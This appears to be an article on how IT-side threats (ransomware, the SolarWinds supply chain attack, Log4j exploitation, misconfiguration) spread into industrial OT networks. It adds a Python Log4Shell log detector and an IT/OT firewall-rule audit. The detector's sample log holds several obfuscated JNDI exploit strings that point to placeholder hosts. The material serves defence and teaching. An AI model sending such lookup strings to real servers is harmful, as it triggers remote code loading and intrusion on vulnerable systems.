The impact of IT threats on OT environments
In recent years, cyber threats have been rising against not only information technology (IT) systems but also industrial control systems (ICS) and operational technology (OT); incidents affecting ICS/OT in particular have surged.
The threat to industrial organizations' ICS/OT infrastructure is a relatively new problem that is growing at an accelerated pace. IT threats can be severe and cause significant harm to a business, but threats to ICS/OT infrastructure can have an even greater impact: disrupting operations, damaging property, harming the organization's reputation, endangering personal safety, extorting ransom, exposing proprietary information to cybercriminals, and bringing the entire business to a standstill.
Historically, industrial organizations have maintained a strict segregation between their IT and ICS/OT systems and departments. This separation allowed each side to recognize and concentrate on its own threats, risks, and vulnerabilities. However, the push towards digital transformation and the drive to interconnect everything have increased IT/OT convergence, and that convergence has brought the threats and risks of both domains together.
Inadequate security perimeters between IT and OT networks
Industrial organizations commonly face cyber attacks aimed at their IT infrastructure. Such attacks can also have a significant impact on the operational technology (OT) side of the organization's networks, and therefore raise risk considerably. Attacks that affect ICS/OT typically begin by infiltrating the victim's enterprise network and then pivot into the ICS/OT environment.
Asset owners must weigh the costs, benefits, and risks of integrating or hyperconnecting IT and OT environments, especially where such connections or automation are not essential. OT linked to an IT network can be exposed to extremely damaging attacks. Administrative guidelines should be put in place to minimize the risks facing critical systems and networks that are connected to IT networks.
Over the last few years, ransomware operations have grown considerably as a threat.
The adoption of remote work policies during the COVID-19 pandemic, which let employees connect remotely to enterprise infrastructure, is among the factors behind the upsurge in ransomware attacks in the industrial sector.
Although ransomware attacks primarily target IT infrastructure, they can also affect OT systems that depend on or are connected to it. By disrupting the IT systems that ICS/OT owners rely on, ransomware gangs can severely affect business and operational continuity and force lengthy recovery periods. In most cases the attackers also publish data stolen from the victim on dark web leak sites or sell it to other criminal groups. The combined effect can be significant reputational harm, financial loss, disclosure of customers' sensitive information and, where OT is disrupted, a risk to human life or property.
The use of Ransomware as a Service (RaaS) as a means of generating financial gain is also growing, with the number of RaaS groups increasing in recent years. In May 2021, the DarkSide ransomware gang targeted the enterprise IT infrastructure of Colonial Pipeline, bringing its OT operations to a halt. The DarkSide group compromised the company's domain controllers and then moved laterally to other IT assets. Because of inadequate segmentation and a lack of visibility into the OT network, the company chose to contain the attack by suspending OT operations as a precaution, so that the attacker could not reach the OT side of the network. The financial repercussions of suspending the pipeline were substantial, but the company judged them less severe than the consequences of the attacker penetrating the OT environment.
Supply chain attacks
Supply chain attacks have been a major concern since a state-sponsored campaign targeting SolarWinds' Orion business software was uncovered. The campaign affected around 18,000 organizations out of roughly 300,000 SolarWinds customers worldwide. For industrial organizations, the particular risk of the SolarWinds supply chain attack was that many ICS Original Equipment Manufacturers (OEMs) use Orion directly in their products or as white-labeled security products. The attack, known as Sunburst, delivered trojanized software that created a backdoor through which the attackers could access the systems and networks of SolarWinds customers. From that foothold in the IT infrastructure of entities that installed the trojanized software, the attackers could pivot to the OT network.
Exploitation of vulnerabilities
One tactic attackers use against industrial organizations is exploiting unpatched, publicly accessible applications in both their IT and OT infrastructure. This method can be highly effective at compromising the victim's environment while sidestepping the detection and prevention controls that may be in place against other techniques.
Threat actors capitalize on the rush to exploit newly disclosed vulnerabilities: because many actors exploit the same flaw at the same time, it becomes difficult for cybersecurity firms and government agencies to attribute a given attack to them. An example is the successful exploitation of the Log4j vulnerability (CVE-2021-44228) in the industrial sector. Although no impact on OT operations has been reported, exploitation of the vulnerability gives attackers easy access to the victim's environment, which they can use to disrupt operations or move laterally to the OT side of the network. By the end of December 2021, the total number of IT/OT security vulnerabilities disclosed in that year had reached a new all-time high of 18,376.
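The Log4j exploitation described above leaves a recognisable trace in whatever the application logs: a JNDI lookup string such as ${jndi:ldap://...} placed in a URL, header or User-Agent. The following detector is an added example, not code from the original article; it normalises the two common obfuscations (URL encoding and nested single-character lookups such as ${lower:j} or ${::-j}) and then looks for the lookup. The access-log lines are constructed for this example and the IP addresses are documentation ranges.

```python
"""
Added example (not from the original article): detect CVE-2021-44228
(Log4Shell) exploitation attempts in web-server access logs.  Attackers
embed a JNDI lookup such as ${jndi:ldap://...} in any field Log4j may log
(User-Agent, URL, headers); the usual obfuscations are nested lookups
(${lower:j}, ${::-j}, ${env:X:-j}) and URL encoding.  The sample log
lines below are constructed for this example.
"""
import re
import urllib.parse

# Nested lookups that resolve to one character, e.g. ${lower:J}, ${upper:n},
# ${::-d}, ${env:NOPE:-i}.  They are collapsed to the character they produce,
# so "${${lower:j}ndi:" becomes "${jndi:".
_SINGLE_CHAR_LOOKUP = re.compile(
    r"\$\{(?:(?:lower|upper):(.)|[^{}]*?:-(.))\}", re.IGNORECASE)
# The lookup itself; group 1 is the JNDI scheme (ldap, ldaps, rmi, dns, ...).
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+):", re.IGNORECASE)


def normalize(s: str) -> str:
    """URL-decode (repeatedly, to defeat double encoding) and collapse
    single-character lookups until the string stops changing."""
    for _ in range(3):
        decoded = urllib.parse.unquote(s)
        if decoded == s:
            break
        s = decoded
    prev = None
    while prev != s:
        prev = s
        s = _SINGLE_CHAR_LOOKUP.sub(lambda m: m.group(1) or m.group(2), s)
    return s


def find_jndi(line: str):
    """Return the JNDI scheme if the line carries a lookup, else None."""
    m = _JNDI.search(normalize(line))
    return m.group(1).lower() if m else None


def scan(lines):
    """Return [(client_ip, scheme)] for every access-log line with a lookup.
    The client IP is assumed to be the first whitespace-separated field."""
    hits = []
    for line in lines:
        scheme = find_jndi(line)
        if scheme:
            hits.append((line.split()[0], scheme))
    return hits


# Constructed sample: one benign request, then plain, nested-lookup,
# URL-encoded and ${::-x} obfuscated exploitation attempts.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:10:01:22 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:10:02:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.8 - - [10/Dec/2021:10:02:41 +0000] "GET /?x=${${lower:j}ndi:${lower:r}mi://198.51.100.8/b} HTTP/1.1" 404 0 "-" "curl/7.68"',
    '198.51.100.9 - - [10/Dec/2021:10:03:10 +0000] "GET /login HTTP/1.1" 200 12 "-" "%24%7Bjndi%3Adns%3A%2F%2Fexample.test%2Fc%7D"',
    '203.0.113.4 - - [10/Dec/2021:10:04:00 +0000] "GET /${${::-j}${::-n}${::-d}${::-i}:ldap://203.0.113.4/d} HTTP/1.1" 400 0 "-" "-"',
]

if __name__ == "__main__":
    for ip, scheme in scan(SAMPLE_LOG):
        print(f"{ip}: JNDI lookup via {scheme}")
```

A hit is an exploitation attempt, not proof of compromise; the follow-up is to check whether the host made an outbound LDAP/RMI/DNS connection to the address in the lookup, and to patch Log4j regardless.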
Security misconfiguration and technical failures
The growth of digital transformation and the integration of IT technologies into OT systems carry a significant risk of transferring IT problems into the OT environment. Attack paths and failures that were once confined to IT systems are now a challenge for OT systems as well, and a lack of cooperation and understanding between IT and OT operators can compromise the availability, security, and operational functionality of ICS/OT systems. The nationwide outage of the Polish railway system in March 2022 is a prime example of how IT-centric issues can affect the business and operational continuity of industrial organizations: a coding flaw in the traffic control system at multiple locations led to an outage of more than 24 hours that disrupted rail traffic across the country.
Finding misconfigured servers, cloud services, and applications exposed to the internet is easy for attackers, and the resulting risk to infrastructure can be significant. Misconfigurations such as outdated systems, default account settings, weak firewall protection, and improper infrastructure zoning have emerged as a major IT security issue in recent years and rank among the top security vulnerabilities.
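The segmentation failures this section and the earlier IT/OT perimeter discussion describe (the internet or the enterprise zone reaching OT broadly, ICS protocol ports exposed beyond a designated jump host) are mechanical to check once the boundary firewall policy is exported. The audit below is an added example, not code from the original article or any vendor; the zone names, the rule format, the approved jump host and the sample ruleset are assumptions made for the example.

```python
"""
Added example (not from the original article): audit an exported IT/OT
boundary firewall policy for zoning mistakes.  Zones, rule fields, the
approved jump host and the sample policy are assumptions for this example.
"""
from dataclasses import dataclass

# Well-known ICS protocol ports (TCP).
ICS_PORTS = {
    102: "S7comm",            # Siemens S7 over ISO-TSAP
    502: "Modbus/TCP",
    2404: "IEC 60870-5-104",
    20000: "DNP3",
    44818: "EtherNet/IP",
}
# Hosts allowed to originate ICS-protocol sessions into OT (assumed jump host).
APPROVED_OT_JUMP_HOSTS = {"10.20.0.10"}


@dataclass(frozen=True)
class Rule:
    name: str
    src_zone: str      # "internet", "it", "dmz", "ot" or "any"
    src: str           # CIDR, host address or "any"
    dst_zone: str
    dst: str
    ports: frozenset   # destination TCP ports; empty set means "any port"
    action: str        # "allow" or "deny"


def audit(rules):
    """Return [(severity, rule name, reason)] for every allow rule into the
    OT zone that violates the zoning model; at most one finding per rule."""
    findings = []
    for r in rules:
        if r.action != "allow" or r.dst_zone != "ot":
            continue
        ics = sorted(p for p in r.ports if p in ICS_PORTS)
        if r.src_zone == "internet":
            findings.append(("critical", r.name, "internet reaches OT directly"))
        elif not r.ports:
            findings.append(("high", r.name,
                             f"{r.src_zone} -> ot on any port (no service restriction)"))
        elif ics and r.src not in APPROVED_OT_JUMP_HOSTS:
            names = ", ".join(f"{ICS_PORTS[p]}/{p}" for p in ics)
            findings.append(("high", r.name,
                             f"ICS protocol(s) {names} reachable from {r.src}, not a jump host"))
        elif r.src == "any":
            findings.append(("medium", r.name,
                             f"any host in {r.src_zone} may reach OT on {sorted(r.ports)}"))
    return findings


# Constructed sample policy: a clean historian rule, an internet-exposed PLC,
# a flat IT->OT "any" rule, a proper jump-host rule, an engineering
# workstation talking EtherNet/IP straight from the enterprise LAN, and the
# default deny.
SAMPLE_POLICY = [
    Rule("allow-historian-read", "it", "10.10.5.0/24", "ot", "10.20.1.5", frozenset({443}), "allow"),
    Rule("vendor-remote-plc", "internet", "any", "ot", "10.20.1.20", frozenset({502}), "allow"),
    Rule("it-to-ot-any", "it", "any", "ot", "any", frozenset(), "allow"),
    Rule("jump-to-plc", "dmz", "10.20.0.10", "ot", "10.20.1.0/24", frozenset({102, 502}), "allow"),
    Rule("eng-ws-to-plc", "it", "10.10.7.15", "ot", "10.20.1.0/24", frozenset({44818}), "allow"),
    Rule("default-deny", "any", "any", "ot", "any", frozenset(), "deny"),
]

if __name__ == "__main__":
    for severity, name, reason in audit(SAMPLE_POLICY):
        print(f"[{severity}] {name}: {reason}")
```

Running it on the sample policy reports the internet-exposed Modbus rule as critical and the flat IT-to-OT rule and the engineering workstation rule as high, while the historian and jump-host rules pass. The same structure extends to default-account and patch-level checks by adding further rule or asset attributes and tests.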